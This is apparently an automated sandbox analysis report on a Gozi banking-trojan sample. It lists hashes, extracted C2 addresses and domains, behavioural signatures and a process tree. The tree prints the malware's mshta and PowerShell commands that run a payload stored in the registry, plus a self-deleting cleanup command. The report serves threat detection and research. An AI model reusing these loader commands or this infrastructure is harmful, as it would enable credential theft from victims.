Overview

overview

10

Static

static

3

client.exe

windows7-x64

10

client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2023 13:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    client.exe

  • Size

    296KB

  • MD5

    3f39517fb0f5de4ba10e72242fb6cd9a

  • SHA1

    d9c68d8110038c21b9d1c5763eab9331c2cf3b45

  • SHA256

    b3a2a819e27b004310e65c2b6b000cb8444b3233271a5064e5314d9580d128d3

  • SHA512

    c69a9438a9915724233aff2a45a25421a33d05ff2fdcaa7ffdef7dd67f2c27aa1f0894e1c0b11def837d01515dbf42931d4ac829a0ea6a40b115002e615f7ebe

  • SSDEEP

    3072:pqrRrmv3TwaCRNnA/UeXFa3mSRACC2IS/gc/LRxNuIY:QrRyvDwaCRNn4XQ2wACZgc/LR/u

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

185.247.184.139

62.72.33.155

incontroler.com
Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3728
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4896
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4084
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3140
        • C:\Users\Admin\AppData\Local\Temp\client.exe
          "C:\Users\Admin\AppData\Local\Temp\client.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1984
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 472
            3⤵
            • Program crash
            PID:4780
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>K9bn='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K9bn).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name eenmgeo -value gp; new-alias -name hbxehnxdf -value iex; hbxehnxdf ([System.Text.Encoding]::ASCII.GetString((eenmgeo "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3260
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zhwxncga\zhwxncga.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2100
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8846.tmp" "c:\Users\Admin\AppData\Local\Temp\zhwxncga\CSC425E5014B485449A8BE82E86A9D321A.TMP"
                5⤵
                  PID:4516
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4hsestzl\4hsestzl.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3556
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89AD.tmp" "c:\Users\Admin\AppData\Local\Temp\4hsestzl\CSC8533E1C3F5F34702811C851C3BD6A958.TMP"
                  5⤵
                    PID:4368
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4668
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:344
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:1980
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:1308
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1984 -ip 1984
              1⤵
                PID:992

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\4hsestzl\4hsestzl.dll
                Filesize

                3KB

                MD5

                437fedb59c936dd8bb79458df19d4ef1

                SHA1

                3a8d722e642cb3f0cbbfb340884d670b5a9e1939

                SHA256

                d3eec5c4a8ec7ae24cb90b8f2d7415c9b950da175b831c171e87673ce9654778

                SHA512

                fbb21b0b6571754be659c1e0950fb84f1b1f8b1700c92131876907d24a22f6278454f95893495e30181886c761baed137fd46450fe1d90b39f6fb99378f2deea

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES8846.tmp
                Filesize

                1KB

                MD5

                9e11d151c0af759c9099a3625cde300b

                SHA1

                4fbcf1c84c2e6c242cd6a906b8e43dc6e9bcd7db

                SHA256

                175fe550dfa70beffea8d47fe1d96d0f6f49de952406ea41534fcba085f16a0b

                SHA512

                b17f7d7e53418a3518d8a498016eada5e6ae41b9cb4546acf0b01df11e157cf722ed68730bfe18153aee08401565c39f653bd4e74e13f053398bee6e2e94e203

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES89AD.tmp
                Filesize

                1KB

                MD5

                d2f3312cb862196b759de3031d839bbe

                SHA1

                389ec87104ce0eb23dd6b21dd0b5af4c65c1914a

                SHA256

                38722e90cb0148be304ba798c7198f34c6d5054c57c7ae35c780c1471d9e0deb

                SHA512

                2a75cee19d44079df2304bcf1615e2b4952326848434044d3a35d76d610dac922f1eeb1f809406653391f16673e6e599c6bfaec44d69ce8484ccd4ded8838caa

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2khimpha.2fx.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\zhwxncga\zhwxncga.dll
                Filesize

                3KB

                MD5

                2282b5652a9fd6370d013058a188336f

                SHA1

                3e041278f49c0153a201197631465079ba56ad74

                SHA256

                cfbab90cec0c6073fc47b28726a571b85d5ee555dbea67dec102461a50d7c34d

                SHA512

                e813eb5f9045a852d7ca0b1f2b277a99e298097d5f31ca43507a574cfd54da38ca9443ace125c6ccaa6ffed5d64e2861e6e787f3b2f9dbeaff554c1d93096077

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\4hsestzl\4hsestzl.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\4hsestzl\4hsestzl.cmdline
                Filesize

                369B

                MD5

                d221a30431a9fbffeb2cf13ed364b3a1

                SHA1

                f19faa285d60805abd43e5a2b90ca50277b0d0e3

                SHA256

                1003db25f55afdda936668825522181d738239d34c3a49cdadb7acc1d1fe69ae

                SHA512

                4ba38ed4ac398846fc7deddde8872c4fb4d836b7ad60f4eeb31e2af9b8f33f021b961d2120940a660d8c13ac358fb69bc5986fa943460f47b36caa5171ddda0d

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\4hsestzl\CSC8533E1C3F5F34702811C851C3BD6A958.TMP
                Filesize

                652B

                MD5

                b3debdebc1a82e5d426c431d13e9a832

                SHA1

                2ce3ecd0937721733f7f63e67fa87824b6a21bfa

                SHA256

                be6bb6101faa8780e4acc155e8afc4a7da1c6e5df4a5a5cf0d4e1261226af4ce

                SHA512

                598d06b1cb4b11a67ed0def4ef659c8adb7ffd3e9bb4e2b8aa5e1c06bc36c0f9efd15d88ef83eb7e4beac826e2f9145b1806eec39dbf37e719769c4ea5e533d0

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zhwxncga\CSC425E5014B485449A8BE82E86A9D321A.TMP
                Filesize

                652B

                MD5

                8de02c11cc2fc9c3f65092ec0d68620b

                SHA1

                ffbe82b4606a0b8dc325f0d0fd3d1e6f06a6c2ce

                SHA256

                008613d2f99e23feeb29d03fd06d00fa0b7a54a72a9436b6c1fea61483cd3a47

                SHA512

                4675be742708b464d9edb52e51368ae4620d920e15239523f3ba08b415566f1255d999464d5f46dc36d8c246903efbfe4310201f9fabd04054d8c19334396dc5

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zhwxncga\zhwxncga.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zhwxncga\zhwxncga.cmdline
                Filesize

                369B

                MD5

                4ea51599e846831e686f612f4729cddb

                SHA1

                70f98cde1bcdb65d328c7170005a69d797125af4

                SHA256

                539401d70d9681d4b4ea04d11549ab7e9aedd54210c770f0cf7e25ab80dc5efe

                SHA512

                10afc73dcff8b8593ed46fee642739765c2b85b96eab19bfa2cc07f520784fa5d29e72a593c5bebfbc8ee0ecf014620d48a9b9f2c06a45b21660bda0b431f8f9

                Download Submit
              • memory/344-106-0x0000021AD5DF0000-0x0000021AD5DF1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/344-117-0x0000021AD5D40000-0x0000021AD5DE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/344-102-0x0000021AD5D40000-0x0000021AD5DE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1308-119-0x0000019A00520000-0x0000019A005C4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1308-89-0x0000019A004D0000-0x0000019A004D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1308-88-0x0000019A00520000-0x0000019A005C4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1980-109-0x00000000006F0000-0x00000000006F1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1980-103-0x0000000000990000-0x0000000000A28000-memory.dmp
                Filesize

                608KB

                Download
              • memory/1980-112-0x0000000000990000-0x0000000000A28000-memory.dmp
                Filesize

                608KB

                Download
              • memory/1984-4-0x0000000004030000-0x000000000403D000-memory.dmp
                Filesize

                52KB

                Download
              • memory/1984-3-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/1984-7-0x00000000022A0000-0x00000000023A0000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/1984-2-0x0000000003FD0000-0x0000000003FDB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/1984-114-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/1984-9-0x0000000003FD0000-0x0000000003FDB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/1984-1-0x00000000022A0000-0x00000000023A0000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/1984-8-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/3140-57-0x0000000002890000-0x0000000002891000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3140-95-0x0000000008970000-0x0000000008A14000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3140-56-0x0000000008970000-0x0000000008A14000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3260-25-0x0000021F26B80000-0x0000021F26B90000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3260-54-0x0000021F26B20000-0x0000021F26B5D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/3260-22-0x0000021F0E730000-0x0000021F0E752000-memory.dmp
                Filesize

                136KB

                Download
              • memory/3260-23-0x00007FFBF3F80000-0x00007FFBF4A41000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/3260-68-0x0000021F26B20000-0x0000021F26B5D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/3260-67-0x00007FFBF3F80000-0x00007FFBF4A41000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/3260-24-0x0000021F26B80000-0x0000021F26B90000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3260-38-0x0000021F26AF0000-0x0000021F26AF8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/3260-52-0x0000021F26B10000-0x0000021F26B18000-memory.dmp
                Filesize

                32KB

                Download
              • memory/3728-104-0x0000029337FA0000-0x0000029338044000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3728-71-0x0000029338050000-0x0000029338051000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3728-70-0x0000029337FA0000-0x0000029338044000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4084-77-0x00000223DAD20000-0x00000223DAD21000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4084-76-0x00000223DAD60000-0x00000223DAE04000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4084-113-0x00000223DAD60000-0x00000223DAE04000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4668-98-0x0000021473710000-0x0000021473711000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4668-94-0x0000021473660000-0x0000021473704000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4668-118-0x0000021473660000-0x0000021473704000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4896-116-0x0000020DCD9C0000-0x0000020DCDA64000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4896-82-0x0000020DCD9C0000-0x0000020DCDA64000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4896-83-0x0000020DCB7C0000-0x0000020DCB7C1000-memory.dmp
                Filesize

                4KB

                Download